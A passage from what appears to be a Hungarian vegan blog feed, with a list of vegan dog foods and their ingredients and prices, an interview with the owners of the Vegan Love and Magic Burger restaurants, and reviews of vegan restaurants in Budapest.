borsóliszt (természetes aminosav-forrás), növényi fehérje (hidrolizált). Adalékanyagok: Tápértékkel rendelkező adalékanyagok: A-vitamin (12.000 NE/kg), D3-vitamin (1.200 NE/kg), E-vitamin (130 mg/kg), B1-vitamin (10 mg/kg), B2-vitamin (15 mg/kg), B6-vitamin (15 mg/kg), B12-vitamin (70 mg/kg), C-vitamin (100 mg/kg), niacin (60 mg/kg), pantoténsav (40 mg/kg), folsav (4 mg/kg), L-karnitin (300 mg/kg), biotin (600 mcg/kg), taurin (1.000 mg/kg), vas (180 mg/kg), cink (160 mg/kg), mangán (16 mg/kg), réz (20 mg/kg), jód (2 mg/kg), szelén (0,25 mg/kg). Kiszerelés: 15 kg Ár/kg: 866 Ft Itt rendelheted meg: Zooplus.hu Gabonamentes: Világosbarna, hosszúkás szemek, zsírtartalma mint a Trainer Fitnessé. Ezt még nem próbáltuk, de nagyon szimpatikus az összetétele (a D3 vitamint leszámítva). Összetevők: Burgonya (szárított) (41,0%), borsóliszt (aminosavak természetes forrása) (14,0 %), burgonyafehérje, napraforgóolaj, élesztő (részben hidrolizált, ásványi anyagok, réparost, almarost (3,0%), növényi fehérje (hyidrolizált), cikóriagyökér (őrölt, természetes inulin-forrás), gyógynövények és gyümölcsök (málna, fodormenta, petrezselyem, kamilla, csipkebogyó, édesgyökér, arónia, görögszénamag, áfonya, körömvirág, édeskömény) (0,1%), alga, szárított (0,05%). Adalékanyagok: Tápértékkel rendelkező adalékanyagok: A-vitamin (12.000 NE), D3-vitamin (1.200 NE), E-vitamin (130 mg), B1-vitamin (10 mg), B2-vitamin (15 mg), B6-vitamin (15 mg), B12-vitamin (70 mcg), niacin (60 mg), pantoténsav (40 mg), folsav (4 mg), L-karnitin (250 mg/kg), taurin (1000 mg/kg), biotin (600 mcg), C-vitamin (100 mg/kg), vas (180 mg), cink (220 mg), mangán (16 mg), réz (20 mg), jód (2,0 mg), szelén (0,3 mg). Kiszerelés: 3 kg, 15 kg Ár/kg: 1763 Ft vagy 1332 Ft Itt rendelheted meg: Zooplus.hu Amidog Már Magyarországon is kapható az Amidog és az Amicat (cicaeledel) egy vegán házaspár jóvoltából. Mi még sajnos nem próbáltuk. Két változata létezik, normál és kisméretű kutyáknak való. - Állatkísérlet-mentes - 100% vegán Összetétel: kukorica, kukoricaglutén, kukoricaolaj, rizsfehérje, egész borsó, cukorrépapép, lenmag, bikalcium-foszfát, hidrolizált növényi fehérje, burgonyafehérje, sörélesztő, kalcium-karbonát, nátrium-klorid, repceolaj. Analitikai összetétel: Nedvesség 8%, nyersfehérje 27%, nyerszsír 14%, nyersrost 2.9%, nyershamu 6.2%. Tápértékkel rendelkező adalékanyagok: A-vitamin 26,000 IU/kg, D3-vitamin 1,350 IU/kg, E-vitamin 355 mg/kg, réz-szulfát pentahidrát (réz) 50 mg/kg, vas-karbonát (vas) 348 mg/kg, kalcium-jodát, anhydrous (jód) 25 mg/kg, nátrium-szelenit (szelén) 20 mg/kg, cink-oxid (cink) 160 mg/kg, mangán-oxid (mangán) 56 mg/kg, L-karnitin 300 mg/kg. Kiszerelések: – Normál: 3 kg, 12,5 kg – Kistestű: 0,6 kg, 1,5 kg Ár/kg: – Normál: 2080 Ft, 1550 Ft – Kistestű: 2833 Ft, 2457 Ft Itt rendelheted meg: AmiEgészség.hu MultiFit Vega Krokett A közismert kisállat-felszerelés bolt, a Fressnapf is árul saját márkás, vegetáriánus kutyaeledelt. Összetétel: kukoricakeményítő (22,2%), rizs (16 %), takarmányrizs-liszt, takarmányborsó-liszt (12 %), árpa (10 %), kukorica (10 %), kukoricacsíra-olaj (2,8%), lenmag (2,2 %), monokalcium-foszfát, almatörköly, kalcium-karbonát, sörélesztő (szárított), sörélesztő-kivonat (hidrolizált), nátrium-klorid, kálium-klorid, lignocellulóz, cikóriapor. Analitikai összetevők: fehérje 23%, zsírtartalom 9%, nyershamu 7%, nyersrost 3,2%, kalcium 1,10%, foszfor 0,90%. Adalékanyagok/kg: táplálkozásfiziológiai adalékanyagok: A-vitamin 15000 NE, D3-vitamin 1500 NE, E-vitamin (all-rac-alfa-tokoferil-acetát) 150mg, C-vitamin (L-aszkorbinsav) 62mg, B1-vitamin 7,2mg, B2-vitamin 10,8mg, B6-vitamin 4mg, B21-vitamin 0,06mg, kalcium-D-pantotenát 20mg, niacin 45mg, biotin 0,4mg, folsav 1mg, Kolinklorid 800mg, L-lizin-mono-hidroklorid 575mg, réz (réz(II)-szulfát, pentahidrát) 13,5mg, vas (vas(II)-szulfát, monohidrát) 76mg, jód (kálium-jodid) 1,3mg, mangán (mangán(II)-oxid) 28mg, szelén (nátrium-szelenit) 0,3mg, cink (cink-szulfát, monohidrát) 135mg. Kiszerelés: 2,5 kg és 12 kg Ár/kg: 1120 Ft vagy 917 Ft Hol veheted meg: Fressnapf Trovet Exclusion Ezt sem próbáltuk még, a feltüntetett logó szerint vegetáriánus táp allergiás kutyák részére, de 100% növényi eredetű alapanyagról írnak a weboldalon. Állatkísérleteket még nem tudom, végeznek-e, ezzel kapcsolatban megkérdeztem őket, update várható. - hipoallergén Összetevők: kukorica, szója fehérje koncentrátum, kukoricaolaj, ásványi sók, burgonyafehérje, rizs, pálmaolaj, cukorrépa-apríték, élesztőkivonat (hidrolizátum: manno oligoszaharidok forrása) Analitikai összetevők: fehérje 21,5%, zsír 14%, szervetlen anyag 7,6%, rost 2%, nedvesség 8%, szénhidrátok 46,9%, A-vitamin 22250 IU/kg, D3-vitamin 2225 IU/kg, E-vitamin 100 mg/kg, kalcium 1,5%, foszfor 1%, nátrium 0,25%, kálium 0,67%, vas 132 mg/kg, réz 2 mg/kg, cink 86 mg/kg, mangán 31 mg/kg, jód 1,8 mg/kg. Kiszerelés: 2,5 kg, 12,5 kg Ár/kg: 2 480 Ft vagy 1 375 Ft Itt rendelheted meg: Petnet.hu Zoofast.hu Petissimo.hu Nedves kutyaeledel, kutyakeksz, rágócsont Yarrah Bio Vegetáriánus tálcás nedves táp Nedves tápot általában nincs sok értelme adni a kutyusnak, mivel a szárazak nagyobb sűrűségben tartalmazzák ugyanazokat a tápanyagokat. Válogatós kutyáknak viszont jól jöhet, és új táphoz való átszoktatáskor is segíthet. Én csak kiegészítésnek használom. Összetétel: Szója*, zöldségek (zöldborsó* 6.4%, sárgarépa* 1.6%), zöldségszármazékok*,olajok* (napraforgóolaj*), lestyán*, gyümölcsök* (csipkebogyó 0.2%), ásványi anyagok. * = ellenőrzötten organikus forrásból, Skal 1301. Ár: 1 790 Ft (6 x 150 g) Itt rendelheted meg: Zooplus.hu Yarrah Bio kutyakeksz Szintén a Yarrah Bio terméke ez a kutyakeksz, amit csak úgy nasinak szokott kapni a kisöreg. Összetétel: gabona* (búza*, kukorica*), cukor* (glükóz szirup kukoricából*), olajok* (napraforgó olaj*), ásványi anyagok. * = from controlled organic farming sources, Skal 1301. Kiszerelés: 250 g Ár: 850 Ft Itt rendelheted meg: Zooplus.hu Trixie Veggies Összetevői alapján ez a fogápoló rágócsont vegán, de sajnos tartalmaz mesterséges adalékanyagokat, emiatt csak ritkán veszem. Több méretben kapható, Tódi szereti. Összetevők: Kukorica keményítő, búzaliszt, glicerin, klorofill, élesztő, só, malátacukor. Adalékanyagok: Tartósítószerek és színezékek. Ár: 590 Ft Itt rendelheted meg: Zooplus.hu Dein Bestes Fogkefe A DM-nek is van saját márkás, vegán “kutyafogkeféje”, a Dein Bestes Fogkefe Kutyáknak. Összetétele egyszerű, a 6 db-os csomagban kétféle színű, fogkefe alakú rágóka van. Színezéket ez is tartalmaz. Tódi ennek ellenére szívesen rágcsálja. Összetevők: Gabonák, növényi melléktermékek, élesztő. Adalékanyagok: színezékek. Itt vásárolhatod meg: DM drogériák Ha te is ismersz más, vegán kutyatápokat, vagy kipróbáltátok a fent felsoroltakat, ne habozz, írd meg nekem az info@veganinja.com címre! A házi készítésű vegán kutyaételekről ebben a cikkben most nem volt szó, de a jövőben talán még foglalkozom a témával. The post Magyarországon kapható vegán kutyaeledelek appeared first on VegaNinja.
101 ok, hogy vegán légy!
2016. augusztus 28. Vegangster
James Wildman jó hangulatú, de elgondolkoztató előadása az Animal Rights Foundation of Floria megrendezésében arról, hogyan ver át bennünket a tejipar, avagy hogyan maradtunk a szokásaink rabjai. (A videó angol nyelvű, magyar felirat a CC gomb alatt elérhető)
Szeretnénk vezekelni a Magic Burger miatt – Vegan Love interjú
2016. augusztus 14. Vegán lettem
Számos támadás érte Budapest egyik újdonságának számító vegán street fooderét a Vegan Love-ot. Kellemetlen kérdések, üdítő válaszok: Vegan Love interjú. Amikor egy vegán étterem olyan hype-ot kap még nyitás előtt , mint a Vegan Love, akkor bizony az ember fia feltételezi, hogy nem amatőrök nyitják és kíváncsian elkezd kutakodni kilétük felől. Nem kellett sok ahhoz, hogy az eddigi legnagyobb vegán piaci paradoxon felálljon a szemem előtt, ugyanis kiderült, hogy a Vegan Love éttermet a Magic Burgeres páros nyitja. Ez az ellentmondás komoly ellenszenvet váltott ki úgy bennem is, ahogy sok más vegánban. Számos helyen fejtettem ki véleményem az ügy pozitív és negatív oldalát egyaránt hangoztatva, majd pár személyes beszélgetés után megérett az igény, egy a témát és a páros valódi érzéseit bemutató interjúra. Mióta foglalkoztok vendéglátással? Lilla: 6 és fél éve kezdtük el a vendéglátózást a Magic Burgerrel egy büfékocsiban, majd 3 év után nyitottuk meg az első éttermünket. Amikor megnyílt a Magic Burger én már vegetáriánus voltam. Peti akkor még húst hússal evett és minden álma egy hamburgerező volt, így abban maradtunk, hogy ő elkészíti a normál hamburgereket én pedig kidolgozom a vega burgereket. Péter: Ahogy Lilla mondta én voltam a megrögzött húsimádó. Rosszul éreztem magam, ha egy napig nem ehettem húst, steaken és burgeren éltem gyakorlatilag. A célom annyi volt, hogy jó minőségű ételeket adjunk az embereknek és ez akkor elégnek is tűnt nekem. Ugyan Lilla vega volt, de a veganizmus nem volt ennyire elterjedt, illetve nem volt ennyi csatorna, ahonnan az infókat kaphattuk volna és én nem is tudtam akkoriban, hogy mi az a vegán. Hogyan kerültetek akkor kapcsolatba a veganizmussal? Lilla: Élesben először akkor találkoztunk a veganizmussal, amikor jött két amerikai aktivista a PETA-tól, akiknek én voltam a budapesti vezetőjük. Lindsay és Nicole 2006 körül azért voltak itt, hogy a Westendnél testfestéssel tiltakozzanak a szőrmeviselés ellen. Ez akkor számunkra és úgy egyáltalán itt Magyarországon egy szokatlan dolog volt, de az itt létük kevés ideje alatt realizálódott bennünk a segítségükkel, hogy mit jelent a veganizmus. Ennyi számomra elég volt ahhoz, hogy eldöntsem a vegetarianizmus nem elég, vegánnak kell lennem. Akkoriban ez még egy kicsit más volt és sokkal nehezebbnek tűnt. Nem nagyon lehetett vegán háztartási cikkeket kapni és lényegében főzhettem rizst répával aztán annyi. Péter: Igen az a pár nap komoly hatással volt ránk. Az ezt követő időszakban Lilla sokat morfondírozott az átálláson, majd a Magic Burger megnyitását követő években egyre keményebben bombázott a vegán ideológiával. Egyre többet jártunk vegán helyekre és folyamatosan mutogatta nekem az aktuális videókat. Viszont ami nagyon fontos volt emellett, hogy kialakult egy komolyabb egészségügyi probléma a gyomrommal, ami akkor erősödött amikor húsokat ettem. Egy idő után rá kellett jönnöm, hogy semmilyen állati eredetű étel nem tesz jót nekem. Így napról napra, hétről hétre elkezdtem elhagyni a húsos és állati eredetű ételeket. Tehát én első körben az egészségem miatt, magam miatt hagytam el mindent, de egy idő után ez bennem is átalakult egy etikus döntéssé és ideológiává Lilla segítségével. Elég volt, ha arra gondoltam, hogy otthon van egy csomó kutyánk, macskánk, miért lennének a levágandó állatok mások, mint ők? Ezelőtt, a vegán témájú videókat ugyanúgy elutasítóan kezeltem, ahogy mindenki, majd amikor már elért egy kritikus szintet bennem az információ, akkor beütött. Pontosan emlékszem, hogy egyszer rászántam magam és megnéztem a PETA egyik 20 perces videóját, amiben az utca emberének mutatják a vágóhídi és egyéb állatipari videókat. Először csak az emberek reakcióit mutatják , ahogy sírnak és elrántják a fejüket, majd azt vetítették le amit ők is láttak. Kőkemény, tömény és kegyetlen kaszabolás, vágohídi és tejipari kínzás és szenvedés. Akkor döntöttem 100 %-osan a veganizmus és az állatjog mellett. Illetve bocsánat, amíg a Magic Burgert jelen formájában üzemeltetjük, addig csak növényi alapú étkezésről beszélhetünk. Ezek után joggal merül fel a kérdés bennem, hogy milyen érzés bejárni a Magic Burgerbe dolgozni? Lilla: Számomra a Magic Burger a nyitástól kezdve egy paradoxon volt. Egyrészről nagyon örültem a sikereinknek, másrészről egyre szarabbul éreztem magam. Egyre sűrűbben mondtam Péternek, hogy én ezt hosszú távon nem leszek képes csinálni. Sok vita volt ebből otthon, de valahol mind a ketten tudtuk, hogy nem ez a célállomás. Számos cikk állította rólatok, hogy vegánok vagytok. Ti hogyan vélekedtek? Péter: A Magic Burger miatt nem lehetünk azok, ez egyértelmű és minden interjúban elmondtuk, hogy ne írják rólunk ezt. Pontosan tudjuk mit jelent a veganizmus és nem szeretnénk sem magunkból ,sem a kifejezésből karikatúrát csinálni. Ennek ellenére volt aki leírta, de ezzel nem tudunk mit kezdeni. Főleg, hogy ezek nem fizetett cikkek voltak így nem is nagyon szólhattunk bele a tartalmába. Válaszoltunk a feltett kérdésekre ők pedig megírták, ahogy ők látták. Sokan támadnak azzal is, hogy csak a pénz miatt csináljátok a Vegan Love-ot. Péter: Ehhez csak annyit hadd szóljak, hogy ha valóban a pénz érdekelt volna minket, akkor nem a veganizáláson gondolkozunk, hanem nyitunk még 2-3 Magic Burgert, ami ötször-tízszer annyi pénzt hozott volna, mint amire a Vegan Love képes lesz az elkövetkezendő években. Lilla: Emellett konkrétan háromszor annyiba került a Vegan Love megnyitása, mint a Magic Burger jóval nagyobb üzletének a megnyitása és az sem egy utolsó szempont, hogy a Vegan Love esetében egyelőre épphogy nullára jön ki a matek és a Magic Burger tartja el. Szóval hihet akárki akármit, egyelőre ez nem éri meg. A most hallottak alapján vegyesek, de inkább negatívak az érzelmeitek a Magic Burgerrel. Mi lesz a sorsa? Lilla: A negatív érzelem kizárólag a húsokhoz és az állati eredetű alapanyagokhoz fűződik. Az éttermet, a rendszert amit fejlesztettünk, a vendégeinket, a dolgozóinkat, a konkrét munkát a mai napig imádjuk. Az az álmunk, hogy ugyanezt csinálhassuk ugyanezeknek a vendégeinknek, ugyanott, de hús, tojás, tejtermékek nélkül. Volt egy nagyon nehéz korszakunk körülbelül 2 éve, amikor már mindketten erősen veganizálódtunk. Egyik este úgy mentünk haza, hogy nagyon tele volt a hócipőnk a Magic Burgerrel és szóba került, hogy eladjuk a céget. Aztán gyorsan rájöttünk, hogy ez nem lenne megoldás, mert ebben az esetben valaki ugyanezt folytatná és állatok ezrei halnának meg továbbra is. Ugyan lett volna pénzünk, de semmilyen pozitív hozadékát nem láttuk annak, hogy valaki még 10 évig tonnaszámra árulja a húsokat. Nagyon sokat gondolkodtunk azon, hogy hogyan tovább úgy, hogy az igazán jó legyen. Simán el is adhattuk volna és nyithattunk volna egy vegán hamburgerezőt. Ez lett volna az egyszerűbb út, de nem ezt választottuk. Péter: Egy idő után az tisztává vált, hogy a Magic Burgert átalakítjuk. Azt még nem tudtuk akkor, hogyan vezetjük rá a vendégeinket, hogy mennyire rohadt jó lesz nekik, ha vegán hamburgereket esznek, de a végső célunk ez. Lényegében amellett döntöttünk, hogy az étlapot szépen lassan átalakítjuk, és folyamatosan levesszük a húsos kajákat, melyeket vegán kajákkal helyettesítünk. Ha bemész a Magic Burgerbe már azt látod, hogy elég egyszerű módon az étlap fele le van ragasztva, három féle húst teljesen megszüntettünk, a sajtok nagy részét levettük az étlapról, amelyeket vegán sajtokkal fogjuk helyettesíteni, a nem vegán tönkölyös bucinkat pedig megcsináltattuk úgy, hogy vegán legyen. Hogyha pedig átfordul úgy az arány, hogy a vegán burgereket eszik többen, akkor az egyik rostlapot csak és kizárólag vegán ételek elkészítésére használjuk majd, hogy a vegánoknak és vegetáriánusoknak is megfeleljen. És így fogunk szépen lassan addig haladni, amíg a Magic Burger is vegán hamburgerező lesz. Szerintem ennél jobban nem oldhatjuk meg azt, hogy a húsevő vevőinket megtartsuk úgy, hogy egyre kevesebb húst egyenek, illetve nálunk egyáltalán ne egyenek semmilyen állati eredetű ételt. Lilla: Egyébként a Magic Burger facebookjával már nem is foglalkozunk igazán egy ideje, nem írunk bejelentkező hosszú posztokat sem. Nem volt már kedvünk. Ez egy idő után nagyon kellemetlen volt, főleg a vendégek miatt és pont nemrég tettünk ki egy posztot a várható változásokól. Amikor felvesztek valakit kikötés, hogy vegán legyen? Lilla: Nem. Több okból sem. Az egyik, hogy törvényellenes így feladni hirdetést. A másik, hogy ahogy a Magic Burgernél is, úgy ezen a vonalon is a célunk, hogy megmutassuk az alternatívát olyanoknak, akik még nem találkoztak vagy csak ismerkednek a veganizmussal. Körülbelül 30-an dolgozunk most a cégnél és kőkeményen bombázzuk az összes alkalmazottunkat a veganizmussal. Azokon a napokon, amikor a dolgozóink a Vegan Love-ba vannak beosztva, természetesen nem hoztatnak be az étterembe állati eredetű ételt, viszont nyilván az aznapi ebédjét úgyis a vegán étlapról választja, így az az étkezése már növényi alapú, már ezzel is nyertünk egy kicsit. Emellett mindenki kap tőlünk vegán tájékoztató könyvet és bizony már van olyan alkalmazottunk, aki emiatt vegán lett, valamint többen a vegává válás útjára léptek. Szóval az ügy szemszögéből sokkal hatásosabbnak tartom nem vegánokat alkalmazni. Többen drágállják a Vegan Love árait. Péter: Ezt azzal a tévhittel kötném össze, miszerint sokan úgy gondolják, hogy a húsos burgerek drágábbak, mert a zöldség alapvetően olcsóbb. De ez a mi esetünkben nem igaz, mert olyan alapanyagokból dolgozunk melyek jóval drágábbra jönnek ki hamburgerenként, mint a Magic Burger esetében. Az alapanyagaink 40-50%-a bio és a sajt amit használunk pedig szigorúan Violife. Lilla: Emellett sokkal több munka van egy vegán hamburgerrel, mint egy húsossal. A vegánban nem nagyon használunk készételeket alapanyagnak, szinte mindent mi gyártunk, még a szójatejet is. Amíg a Magic Burgerben öt ember elvisz egy hétfőt kényelmesen, addig a Vegan Love-ban ugyanannyi ember megszakad. Ezt úgy képzeld el, hogy a Vegan Love-ban minden receptünk 10-15 összetevős, ezáltal ötször annyi idő elkészíteni az ottani alapanyagokat, mint a Magic Burgerben. Lényegében az alkalmazottak egész nap recept szerint gyártják le a burgerekhez és hotdoghoz valókat. Honnan szerzitek be az alapanyagokat? Péter: Körülbelül 40 beszállítóval dolgozunk és nagyon változatos helyekről érkeznek az alapanyagok, viszont igyekszünk egyre több mindent mi elkészíteni. A tejektől kezdve a szószokon át már minden saját. Ez alól kivétel a sajt egyelőre, az nagy falat lenne. De tervben van a sajt is, illetve a saját tofu és saját szejtán készítése is, csak egyelőre az a problémánk, hogy nagyon kicsi a Vegan Love konyhája. Nincs elég hely és ezáltal kielégítő infrastruktúra sincs. Mi a véleményetek a magyar vegán szcénáról? Péter: Érzésem szerint erősen kettészakad a vegán társadalom. Van egy nagyon radikális része és van egy elfogadóbb, befogadóbb része. Mindig amikor látom egyik-másik oldalt, az a kérdés fogalmazódik meg bennem, hogy melyikkel érhetünk el nagyobb előrelépést és egyértelműen mindig az utóbbinál kötök ki. Lilla: Az igazán radikális elemekkel nem találkoztam még soha élőben. Mindig csak facebookon látom őket. Sokan nagyon ellenzik a húsutánzatok készítését. Hogy álltok ehhez a kérdéshez? Péter: Amikor a fejeket 30 évig húszabálásra kondicionálják, akkor ha nem adsz nekik gumicsontot, sokkal könnyebben visszakattanhatnak a húsra. Így van lehetőséged pótolni a megszokott kajákat. Mit jelent nektek a veganizmus? Péter: A lehetőségekhez mérten legkevesebbet árts az állatoknak. Tudom, hogy a definíciója nem ez, de nagyon sokan más és más szakaszában vannak ennek az útnak és feladatomnak érzem, hogy segítsem őket. Lilla: Mi azt valljuk, hogy vannak a vegánok és a még nem vegánok. Támogatunk mindenkit és információt próbálunk átadni annak érdekében, hogy ez az arány egyre gyorsabban átforduljon. Péter: Igen egészen konkrétan megpróbáljuk minél több vegyes táplálkozásúnak megmutatni az utat minden eszközzel ami a kezünkben van, akár a nehezebb utakat is választva. Így szeretnénk vezekelni a Magic Burger miatt. Milyen újítással készültök a Vegan Love-ban? Péter: Szeretnénk becsempészni a kínálatba nyers ételeket. Nyers hamburger, nyers hotdog, nyers köretek. Ez a következő misszió. Fenntarthatóság? Lilla: Hirtelen váltás. (nevet) A Vegan Love-ban szelektíven gyűjtjük a szemetet, már amennyire a lehetőségek engedik és a műanyag pohárról most váltunk kukoricapohárra. Palackozott üdítőket nem tartunk és az üdítők, amiket csinálunk, tisztított vízből készülnek. Otthon is igyekszünk mindent megtenni annak érdekében, hogy minél kevesebbet ártsunk. Van egy hatalmas komposztálónk, ahova a szerves hulladékot dobjuk, valamint az esővizet is gyűjtjük, amivel a kutyákat itatjuk és ezzel locsolunk. Említettétek, hogy kutyákkal és macskákkal éltek együtt. Mennyi van egészen pontosan és hogy kerültek hozzátok? Péter: Mindketten imádjuk a kutyákat, Lilla pedig a cicákat is, annyira, hogy már belőlük is van 5. Egyébként 6 kutyánk van. Az első kutyámat úgy fogadtam be, hogy besétált az akkori barátnőm sulijába, ő pedig hazahozta. Ő ma már 16 éves, és elég rossz állapotban van, de keményen küzdünk, hogy minél tovább együtt maradhassunk. Lilla: Az összes többi állat is mind örökbefogadott és befogadott, vagy menhelyről vagy gyepmesteri telepről vagy utcáról, vagy ahonnan éppen jött. Az első saját kutyusomat 10 éve találtam az M0-ás mellett szilveszter utáni reggelen. Lényegében szaladt volna be az autók közé annyira meg volt rémülve. Péter: Az elsők után szerettünk volna még közös kutyusokat, melynek csak a közös ház hiánya volt az akadálya. Aztán másfél éve összeköltöztünk és akkor fogadtuk örökbe a másik 4 kutyust is, közben pedig be-be csúszott pár cica. Növényi táplálkozásúak a négylábú lakótársaitok? Péter: Nagyon sokáig próbálkoztunk mindenfélével és a legöregebb kutyán kívül mindegyik vegánul táplálkozik. A fiatalabb kutyusok kicsattannak a vegán tápoktól. Lilla: A cicáimmal is kb ugyanez a helyzet. A fiatalabbak tökéletesen átálltak és makk egészségesek, az öregebb macska már nem kultiválta a váltást. Foglalkoztok aktívan állatmentéssel is? Lilla: Nem. Nincs rá időnk. Viszont ismerünk állatmentőket, akik tudják, hogy ha nagy gáz van akkor nekünk tudnak szólni. Például, ha egy állatot el kell vinni Hajdúböszörményből Vácra egy kórházba, akkor minket is szoktak hívni. Péter: Ezt fuvarnak hívják. Vannak olyan segítők, akik csak a szállításban tudnak segíteni és az állatot elviszik A-ból B-be. De ezekért a fuvarokért általában pénzt kérnek. Mi úgy döntöttünk, hogy mivel kocsink és emberünk is van, így ebben tudunk segíteni és segítünk is. Ha egy adott étel lehetnétek, ami a legjobban meséli el, hogy ti milyenek vagytok, melyik lenne az? Péter: Barbeque Tofu Burger. Fűszeres, édeskés és jól lehet téríteni vele. (nevet) Lilla: Chili Dog. Mert csípős, mint én. Köszönöm az interjút és sok sikert! A Vegan Love-ot megtalálhatjátok a weben és a facebookon is.
Mindig frissen! Nagy magyar piaci körkép januártól decemberig
„Mindig szezonális gyümölcsöket és zöldségeket vásárolj!” – hangzik el sokszor. De miért is fontos ez? A frissen vásárolt idényzöldségek és -gyümölcsök nem csak finomabbak, mint beszállított társaik, de vitamin- és tápanyagtartalmuk is jóval nagyobb. Kevesebb növényvédő szer éri őket, kevesebbet utaznak, és legtöbbször olcsóbbak is… kell ennél több érv?
Egy vegán Kínában (5.0)
Hogyan éljünk túl vegánként egy másik országban? Egyszerűen! Magyarországon és azon túl is könnyen és még könnyebben élhetsz tiszta vegán életet. A szupermarketek polcain már megtalálhatók a vegán helyettesítők is. De mi van azzal, aki keletre indul meg? Sőt, távol- keletre? Az hogyan éljen növényi alapokon? Ott, ahol még a betűk világában is nehéz eligazodni?! Virág bebizonyította, hogy igenis lehetséges egy teljesen más kultúrában, méghozzá Kínában is folytatni életmódját. A kezdeti nehézségek
A Vegán Machete
Danny Trejo, a balta-arcú, börtönviselt hollywood-i filmsztár vegánbarát éttermet nyitott Los Angeles-benA taqueria ( magyarul szerencsétlenül valahogy taco-zónak fordithatnánk ) kialakitása igazán stilusosra sikerült, Danny markáns vonásai pedig szinte mindenhonnan visszamosolyognak ránk. Még a kávéja is saját márkásIlyen ételeket szolgálnak felMeg ilyetA megmaradt fogásokat pedig nap végén a közeli hajléktalan menhelynek
Kelbimbós tekercs
Avagy magyar-indiai fúzió… A minap történt, hogy valami vendégvárót kellett előállítanom. Mivel a hőmérő higanyszála bőven 30 fölé kúszott, szó sem lehetett arról, hogy elmenjek a boltig, ezért csupán a kissé kiüresedett hűtő tartalma állt rendelkezésemre. Volt egy pici élesztő, a liszt ugye...
Új vegán éttermek Budapesten, amiket te is imádni fogsz!
Nem panaszkodhatnak a budapesti vegánok, sorra nyílnak az új helyek, ahol jobbnál jobb vegán ételekkel tömhetjük meg a hasunkat, és ha igazán különleges élményre vágyunk, azt is könnyen megkaphatjuk. Három új kedvencről fogok most írni, és egy negyedik, régebbi, ám kevésbé ismert játékosról. Cigköftem vegetáriánus török étterem 1. Cigköftem Teréz körút 20. (az Oktogonon) - vegetáriánus, vegán opcióval A Törökországból induló, de világszerte jelen lévő étteremlánc kínálatában egyetlen finomság áll a középpontban, de azt magas minőségben és őrülten jól harmonizáló ízekkel készítik. Bulgurt és paradicsompürét dolgoznak össze egy sűrű masszává, természetesen sok fűszerrel. Csípős, és kevésbé csípős verzió létezik, de a kevésbé csípős is túl csípős lehet azoknak, akik nincsenek hozzászokva. Apropó, tudtad, hogy a budapesti karácsonyi vásárban kapható csípős, édes, és csípmentes paprika? Hetekig ezen nevettünk, mikor megtaláltuk. Mint kiderült, ez egy létező, de feltehetőleg régies kifejezés. A cigköfte nevű masszát kérheted dürüm (lavas kenyérbe terkerve) és hamburger formájában. Én tekercsben kóstoltam, és rögtön rajongóvá váltam: a masszát belesimítják a lavas kenyérbe (ami olyasmi, mint a tortilla), jégsalátát, uborkát, paradicsomot, mentaleveleket, zellerleveleket tesznek mellé, és itt jön a trükk: gránátalmaszósszal és friss citrom levével locsolják meg az egészet. A cigköfte ízei olyan jól harmonizálnak a mentával és a gránátalmaszósszal, hogy rögtön meg akartam enni egy másodikat. Ami sajnos sikerült is volna, mert az adag elég kicsi, de végül a fagyi mellett döntöttünk. A hamburgeres verzióban ugyanezek az összetevők vannak, csak másképp néz ki, ám ez sem laktatóbb, mint a tekercses testvére, de cserébe 690-790 Ft-os árakkal számolhatunk. Kapható még icli köfte, ami párolt zöldségekkel töltött batyu, van gyümölcssaláta, és előfordul még vegán sütemény is. Kék Ló vegetáriánus étterem és fashion pub 2. Kék Ló Víg utca 28. (a Rákóczi téri piac mögött) - vegetáriánus, vegán opcióval A Kék Ló Fashion Pub régen a Kazinczy utcában volt, upcycled ruhaboltnak indult, majd - a ruha részleget megtartva – kávézóvá és bárrá alakult. Februárban költöztek a Víg utcába, itt már enni is lehet, nem is akármilyet: a napi menü, bár alapvetően egyszerű receptekről van szó, mégis különleges ízpárosításokkal dolgozik. Volt alkalmam beszélgetni tulajdonossal, aki iszonyú jófej, és nagyon hamar megtaláltuk a közös hangot. Mesélt vegánná válásáról, az újonnan felfedezett ízekről, a Ló előéletéről és a további elképzelésekről. Berlinben él, ahol van egy másik, teljesen vegán Kék Ló, melynek hatására a közelben lévő gyrosos és a pékség is elkezdett vegán ételeket árulni. Menüt ettünk, a leves egy répás, gyömbéres, krumplis, kókusztejszínes krémleves volt, a második fogás pedig basmati rizzsel és isteni paprikakrémmel tálalt zöldségragu. Ez után még legyűrtem egy csilis-csokis sütit, aminek a belsejében szaftos gyümölcsdarabok voltak elrejtve. A menü és a süti is naponta változik, ezen kívül helyben készült paninit is készítenek, természetesen vegán verzióban is, és áraik hasonlóan barátságosak, mint a hely maga. Az enteriőrről is érdemes szót ejteni, hiszen nagyon különleges és nagyon öko. Ahogyan a ruhák, a berendezés is upcycled, tehát meglévő tárgyak felhasználásával alkották meg, így is csökkentve az ökológiai lábnyomot. Az ezüstös falak között csupa meghökkentő furcsaság gazdagítja a vizuális élményt. Nehéz bármit kiemelni, inkább nézz be még ma! Mysore Pack vegán és nyers vegán étterem 3. Mysore Pack XI. Szabolcska Mihály utca 3. (az Allee-nál) – vegán és nyersvegán A korábbi VegaRáma helyett nyílt, különleges neve a mysore pak nevű édességre utal, ami az indiai Mysore városából ered. Az indiai tematika vizuálisan is megjelenik az étteremben, a falon indiai istenképek, a földön párnák, a hely hangulatát pedig belengi a spiritualitás, ennek megfelelően a kiszolgálás nagyon barátságos és lelkes. 5 után érkeztünk, páran már izgatottan készültek az esti kirtanra, ami egy zenés mantraéneklés. A tervek szerint minden kedden megrendezik majd. Az ételek ízletesek és szaftosak voltak. Nyers gyömbérlevest, töltött paprikát és ratatuille-t ettünk, amit lekísértünk egy csokis-ananászos palacsintával. Macska vegetáriánus étterem és pub +1. Macska Bérkocsis utca 23. (a Blahához közel) - vegetáriánus és vegán A Macska nem új hely, de a szívemhez és a lakhelyemhez is nagyon közel áll. Inkább pub, mint étterem, rengeteg különleges, kézműves sört tartanak, 2-3 féle magyar, kézműves sör pedig csapoltan is kapható. A kapható ételeknek kb. a fele vegán, a többi vegetáriánus. Bablevesben és mentás borsólevesben verhetetlenek, egy adaggal simán jól lehet lakni, de kóstoltam már náluk más fajta levest és dahlt is. A meleg, otthonos félhomályban mindig van mit nézni, a falakon időszaki kiállítások képei függnek, a párnákon ücsörgős galériára vezető lépcsőt pedig facicák díszítik. A kiszolgálás itt is kedves, szívesen járok vissza hozzájuk. Képek forrása: Facebook, Tripadvisor The post Új vegán éttermek Budapesten, amiket te is imádni fogsz! appeared first on 